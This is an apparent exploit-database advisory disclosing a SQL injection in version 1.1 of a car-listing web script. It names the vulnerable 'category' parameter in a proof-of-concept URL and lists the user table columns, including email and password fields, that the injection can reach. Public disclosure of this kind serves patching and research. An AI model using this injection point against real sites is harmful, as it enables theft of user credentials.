# # # Exploit Title: Auto Car - Car listing Script 1.1 - SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor: http://kamleshyadav.com/ # Software Link: https://codecanyon.net/item/auto-car-car-listing-script/19221368 # Demo: http://kamleshyadav.com/scripts/autocar_preview/ # Version: 1.1 # Tested on: WiN10_X64 # Exploit Author: Bora Bozdogan # Author WebSite : http://borabozdogan.net.tr # Author E-mail : borayazilim45@mit.tc # # # POC: # # http://localhost/[PATH]/search-cars?category=[SQL] # ts_user #user_uname #user_fname #user_lname #user_email #user_pwd # #
体验盒子
